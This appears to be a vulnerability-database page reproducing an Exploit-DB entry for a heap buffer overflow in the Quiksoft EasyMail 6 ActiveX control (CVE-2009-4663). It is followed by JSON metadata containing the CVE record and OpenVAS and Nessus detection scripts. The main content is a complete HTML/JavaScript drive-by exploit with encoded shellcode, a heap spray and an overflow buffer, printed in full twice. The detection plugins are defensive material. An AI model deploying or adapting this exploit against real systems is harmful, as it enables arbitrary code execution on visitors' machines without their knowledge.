Search...

Quiksoft EasyMail 6 AddAttachment Remote Buffer Overflow Exploit

2009-09-17T00:00:00

ID EDB-ID:9705
Type exploitdb
Reporter bmgsec
Modified 2009-09-17T00:00:00

Description

Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit. CVE-2009-4663. Remote exploit for windows platform

                                        
                                            &lt;html&gt;
 &lt;head&gt;
    &lt;!--
      -- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
      -- 
      -- Its old and the latest version doesn't support this method. 
      -- I was bored and a similar post sparked my interest. 
      -- 
      -- Advisory: http://www.bmgsec.com.au/advisory/48/
      -- 
      -- Written by:
      -- bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au)
      --  --&gt;
 &lt;title&gt;Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit&lt;/title&gt;
&lt;object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='test'&gt;&lt;/object&gt;
&lt;script language='javascript'&gt;
       function str_repeat ( input, multiplier ) {
               return new Array(multiplier+1).join(input);
       }

       //windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH
       shellcode = unescape("%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u2474%u5bf4%u4331%u830f%ufceb"+
                            "%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e%u7e12%ua161%u3196"+
                            "%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd%u3e5b%u1499%u75a2"+
                            "%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e%u7aaf%u5a2c%u22bb"+
                            "%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd%uf2d0%uc699%ucb56"+
                            "%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2%u0f22%u8f88%u87ed"+
                            "%u7114%u569b%u7173%u057b%ue11a%ucae7");

       bigblock = unescape("%u9090%u9090");
       headersize = 20;
       slackspace = headersize + shellcode.length;

       while (bigblock.length &lt; slackspace)
               bigblock += bigblock;

       fillblock = bigblock.substring(0, slackspace);
       block = bigblock.substring(0, bigblock.length - slackspace);

       while (block.length + slackspace &lt; 200000)
               block = block + block + fillblock;

       memory = new Array();
       for (i=0; i&lt;500; i++)
               memory[i] = block + shellcode;

       buffer = str_repeat('A', 433);
       buffer += "BBBB";
       buffer += str_repeat(unescape("%0b%0b%0b%0b"), 63);

       test.AddAttachment(buffer, 1);
&lt;/script&gt;
&lt;/head&gt;
&lt;/html&gt;

# milw0rm.com [2009-09-17]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:9705", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Quiksoft EasyMail 6 AddAttachment Remote Buffer Overflow Exploit", "description": "Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit. CVE-2009-4663. Remote exploit for windows platform", "published": "2009-09-17T00:00:00", "modified": "2009-09-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9705/", "reporter": "bmgsec", "references": [], "cvelist": ["CVE-2009-4663"], "lastseen": "2016-02-01T11:12:06", "viewCount": 14, "enchantments": {"score": {"value": 8.6, "vector": "NONE", "modified": "2016-02-01T11:12:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4663"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800993", "OPENVAS:800993"]}, {"type": "nessus", "idList": ["EASYMAIL_OBJECTS_SMTP_ACTIVEX_OVERFLOWS.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13035", "SECURITYVULNS:DOC:29282"]}], "modified": "2016-02-01T11:12:06", "rev": 2}, "vulnersScore": 8.6}, "sourceHref": "https://www.exploit-db.com/download/9705/", "sourceData": "<html>\n <head>\n \n <title>Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit</title>\n<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='test'></object>\n<script language='javascript'>\n function str_repeat ( input, multiplier ) {\n return new Array(multiplier+1).join(input);\n }\n\n //windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH\n shellcode = unescape(\"%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u2474%u5bf4%u4331%u830f%ufceb\"+\n \"%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e%u7e12%ua161%u3196\"+\n \"%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd%u3e5b%u1499%u75a2\"+\n \"%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e%u7aaf%u5a2c%u22bb\"+\n \"%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd%uf2d0%uc699%ucb56\"+\n \"%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2%u0f22%u8f88%u87ed\"+\n \"%u7114%u569b%u7173%u057b%ue11a%ucae7\");\n\n bigblock = unescape(\"%u9090%u9090\");\n headersize = 20;\n slackspace = headersize + shellcode.length;\n\n while (bigblock.length < slackspace)\n bigblock += bigblock;\n\n fillblock = bigblock.substring(0, slackspace);\n block = bigblock.substring(0, bigblock.length - slackspace);\n\n while (block.length + slackspace < 200000)\n block = block + block + fillblock;\n\n memory = new Array();\n for (i=0; i<500; i++)\n memory[i] = block + shellcode;\n\n buffer = str_repeat('A', 433);\n buffer += \"BBBB\";\n buffer += str_repeat(unescape(\"%0b%0b%0b%0b\"), 63);\n\n test.AddAttachment(buffer, 1);\n</script>\n</head>\n</html>\n\n# milw0rm.com [2009-09-17]\n", "osvdbidlist": ["59939"]}

{"cve": [{"lastseen": "2020-10-03T11:54:20", "description": "Heap-based buffer overflow in the Quiksoft EasyMail Objects 6 ActiveX control allows remote attackers to execute arbitrary code via a long argument to the AddAttachment method.", "edition": 3, "cvss3": {}, "published": "2010-03-03T20:30:00", "title": "CVE-2009-4663", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4663"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:quiksoft:easymail_objects:6.0"], "id": "CVE-2009-4663", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4663", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:quiksoft:easymail_objects:6.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:09:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4663"], "description": "This host is installed with QuikSoft EasyMail Objects ActiveX\n Control and is prone to Buffer Overflow vulnerability.", "modified": "2017-02-20T00:00:00", "published": "2010-03-10T00:00:00", "id": "OPENVAS:800993", "href": "http://plugins.openvas.org/nasl.php?oid=800993", "type": "openvas", "title": "Quiksoft EasyMail Objects AddAttachments() ActiveX Control BOF Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_quiksoft_easymail_obj_activex_bof_vuln_mar10.nasl 5368 2017-02-20 14:34:16Z cfi $\n#\n# Quiksoft EasyMail Objects AddAttachments() ActiveX Control BOF Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\n\nA Workaround is to set the killbit for the following CLSID,\n{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\nhttp://support.microsoft.com/kb/240797\";\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute arbitrary\n code in the context of the application with elevated privileges or cause\n the browser to crash.\n Impact Level: Application\";\ntag_affected = \"Quiksoft EasyMail Objects 6.0 on Windows\";\ntag_insight = \"The flaw exists in AddAttachments() method, which fails to perform adequate\n boundary checks on user-supplied data.\";\ntag_summary = \"This host is installed with QuikSoft EasyMail Objects ActiveX\n Control and is prone to Buffer Overflow vulnerability.\";\n\nif(description)\n{\n script_id(800993);\n script_version(\"$Revision: 5368 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:34:16 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-10 15:48:25 +0100 (Wed, 10 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-4663\");\n script_bugtraq_id(36440);\n script_name(\"Quiksoft EasyMail Objects AddAttachments() ActiveX Control BOF Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/9705\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/53325\");\n script_xref(name : \"URL\" , value : \"http://www.bmgsec.com.au/advisories/easymail-6-activex-exploit.txt\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_activex.inc\");\n\n## Check for Windows\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\n## Confirm EasyMail Objects 6.0 installed by checking below registry key\nkey = \"SOFTWARE\\Quiksoft Corporation\\EasyMail Objects\\6.0\";\nif(registry_key_exists(key:key))\n{\n ## Workaround check\n if(is_killbit_set(clsid:\"{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\") == 0){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4663"], "description": "This host is installed with QuikSoft EasyMail Objects ActiveX\n Control and is prone to Buffer Overflow vulnerability.", "modified": "2018-11-30T00:00:00", "published": "2010-03-10T00:00:00", "id": "OPENVAS:1361412562310800993", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800993", "type": "openvas", "title": "Quiksoft EasyMail Objects AddAttachments() ActiveX Control BOF Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_quiksoft_easymail_obj_activex_bof_vuln_mar10.nasl 12602 2018-11-30 14:36:58Z cfischer $\n#\n# Quiksoft EasyMail Objects AddAttachments() ActiveX Control BOF Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800993\");\n script_version(\"$Revision: 12602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 15:36:58 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-10 15:48:25 +0100 (Wed, 10 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-4663\");\n script_bugtraq_id(36440);\n script_name(\"Quiksoft EasyMail Objects AddAttachments() ActiveX Control BOF Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9705\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/53325\");\n script_xref(name:\"URL\", value:\"http://www.bmgsec.com.au/advisories/easymail-6-activex-exploit.txt\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary\n code in the context of the application with elevated privileges or cause\n the browser to crash.\");\n script_tag(name:\"affected\", value:\"Quiksoft EasyMail Objects 6.0 on Windows\");\n script_tag(name:\"insight\", value:\"The flaw exists in AddAttachments() method, which fails to perform adequate\n boundary checks on user-supplied data.\");\n script_tag(name:\"summary\", value:\"This host is installed with QuikSoft EasyMail Objects ActiveX\n Control and is prone to Buffer Overflow vulnerability.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_activex.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Quiksoft Corporation\\EasyMail Objects\\6.0\";\nif(registry_key_exists(key:key))\n{\n ## Workaround check\n if(is_killbit_set(clsid:\"{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\") == 0){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2009-4663", "CVE-2007-4607"], "description": "Buffer overflows, unsafe method.", "edition": 1, "modified": "2013-04-28T00:00:00", "published": "2013-04-28T00:00:00", "id": "SECURITYVULNS:VULN:13035", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13035", "title": "Borland ActiveX security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2009-4663", "CVE-2007-4607"], "description": "\r\n\r\nBorland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows\r\n\r\nActiveX settings:\r\nBinary path: C:\Program Files (x86)\Borland\CaliberRM\emsmtp.dll\r\nVersion: 5.0.0.11\r\nProgID: EasyMail.SMTP.5\r\nCLSID: {4610E7BF-710F-11D3-813D-00C04F6B92D0}\r\nSafe for Scripting: True\r\nSafe for Initialization: True\r\n\r\n\r\nSubmitToExpress and AddAttachment methods are vulnerable see CVE-2007-4607\r\nand CVE-2009-4663\r\n\r\n//rgod\r\n", "edition": 1, "modified": "2013-04-28T00:00:00", "published": "2013-04-28T00:00:00", "id": "SECURITYVULNS:DOC:29282", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29282", "title": "Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T01:57:29", "description": "EasyMail Objects, a set of COM objects for supporting email \nprotocols, is installed on the remote Windows host. It may have been \nbundled with a third-party application, such as Oracle Document \nCapture, Earthlink internet access software, Borland Caliber RM \nClient, and FrontRange Heat.\n\nThe SMTP component of the version of this control installed on the\nremote host reportedly contains multiple buffer overflows involving \nthe AddAttachment and SubmitToExpress methods that could lead to \narbitrary code execution on the affected system. Successful \nexploitation requires, though, that an attacker trick a user on the\naffected host into visiting a specially crafted web page.", "edition": 23, "published": "2007-09-25T00:00:00", "title": "EasyMail SMTP Object ActiveX Control Multiple Buffer Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4663", "CVE-2007-4607"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "EASYMAIL_OBJECTS_SMTP_ACTIVEX_OVERFLOWS.NASL", "href": "https://www.tenable.com/plugins/nessus/26185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26185);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2007-4607\", \"CVE-2009-4663\");\n script_bugtraq_id(25467, 36440);\n script_xref(name:\"CERT\", value:\"281977\");\n script_xref(name:\"EDB-ID\", value:\"4328\");\n script_xref(name:\"EDB-ID\", value:\"9705\");\n\n script_name(english:\"EasyMail SMTP Object ActiveX Control Multiple Buffer Overflows\");\n script_summary(english:\"Checks version of EasyMail SMTP Object control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflow vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"EasyMail Objects, a set of COM objects for supporting email \nprotocols, is installed on the remote Windows host. It may have been \nbundled with a third-party application, such as Oracle Document \nCapture, Earthlink internet access software, Borland Caliber RM \nClient, and FrontRange Heat.\n\nThe SMTP component of the version of this control installed on the\nremote host reportedly contains multiple buffer overflows involving \nthe AddAttachment and SubmitToExpress methods that could lead to \narbitrary code execution on the affected system. Successful \nexploitation requires, though, that an attacker trick a user on the\naffected host into visiting a specially crafted web page.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/526440/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either disable its use from within Internet Explorer by setting its\nkill bit or remove it completely.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Document Capture 10g ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, 'activex_init');\n\n\n# Locate the file used by the controls.\nclsids = make_list(\n \"{4610E7BF-710F-11D3-813D-00C04F6B92D0}\", # Borland Caliber\n \"{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\"\n);\n\ninfo = \"\";\ninstalls = 0;\n\nforeach clsid (clsids)\n{\n file = activex_get_filename(clsid:clsid);\n if (isnull(file))\n {\n activex_end();\n exit(1, \"activex_get_filename() returned NULL.\");\n }\n\n if (!file) continue;\n\n installs++;\n\n # Get its version.\n version = activex_get_fileversion(clsid:clsid);\n if (isnull(version))\n {\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n }\n\n if (version == '') version = 'unknown';\n\n # And check it.\n if (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0)\n {\n info += \n '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version + '\\n';\n }\n}\nactivex_end();\nif (!installs) exit(0, 'None of the affected CLSIDs were found on the remote host.');\n\n\n# Report findings.\nif (info)\n{\n # At this point, we want to know how many *vulnerable* installs there are.\n installs = max_index(split(info)) / 4;\n\n if (report_paranoia > 1)\n {\n if (installs == 1)\n report = info +\n '\\n' +\n '\\nNote, though, that Nessus did not check whether the kill bit was set' +\n '\\nfor the control\\'s CLSID because of the Report Paranoia setting in' +\n '\\neffect when this scan was run.\\n';\n else\n report = info +\n '\\n' +\n '\\nNote, though, that Nessus did not check whether the kill bits were set' +\n '\\nfor the controls\\' CLSIDs because of the Report Paranoia setting in' +\n '\\neffect when this scan was run.\\n';\n }\n else\n {\n if (installs == 1)\n report = info +\n '\\n' +\n '\\nMoreover, its kill bit is not set so it is accessible via Internet' +\n '\\nExplorer.\\n';\n else\n report = info +\n '\\n' +\n '\\nMoreover, their kill bits are not set so they are accessible via' +\n '\\nInternet Explorer.\\n';\n }\n\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n exit(0);\n}\nelse \n{\n if (installs == 1) exit(0, 'One of the controls is installed but its kill bit is set.');\n else exit(0, 'The controls are installed but their kill bits are set.');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}